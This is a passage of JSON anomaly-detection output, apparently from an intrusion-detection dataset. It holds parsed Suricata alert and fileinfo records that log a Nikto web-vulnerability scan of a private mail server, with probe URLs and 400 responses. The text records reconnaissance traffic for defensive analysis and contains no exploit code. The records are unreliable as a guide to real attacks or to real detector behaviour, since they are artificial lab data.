"/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46790,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46790, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1984927709702721,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1984927709702721, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.175637+0000\",\"flow_id\":1984927709702721,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46790,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.178599 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46792 -> 192.168.10.154:80", "/parser/model/time": 1583349514.178599, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46792, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.178599 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46792 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.jsa", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.178847+0000\",\"flow_id\":279331771953661,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46792,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsa\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsa\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.178847, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":279331771953661,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46792,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsa\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsa\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46792,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsa\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsa\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.jsa\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.jsa\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.jsa", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.jsa", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46792,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46792, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":279331771953661,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 279331771953661, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.178847+0000\",\"flow_id\":279331771953661,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46792,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsa\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsa\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.180234 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46794 -> 192.168.10.154:80", "/parser/model/time": 1583349514.180234, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46794, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.180234 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46794 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.org", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.180404+0000\",\"flow_id\":1759467696471457,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46794,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.org\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.org\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.180404, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1759467696471457,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46794,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.org\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.org\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46794,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.org\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.org\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.org\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.org\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.org", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.org", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46794,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46794, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1759467696471457,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1759467696471457, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.180404+0000\",\"flow_id\":1759467696471457,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46794,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.org\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.org\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.181939 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46796 -> 192.168.10.154:80", "/parser/model/time": 1583349514.181939, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46796, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.181939 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46796 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.dpgs", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.182096+0000\",\"flow_id\":1904689130685302,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46796,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dpgs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dpgs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.182096, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1904689130685302,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46796,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dpgs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dpgs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46796,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dpgs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dpgs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.dpgs\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.dpgs\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.dpgs", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", 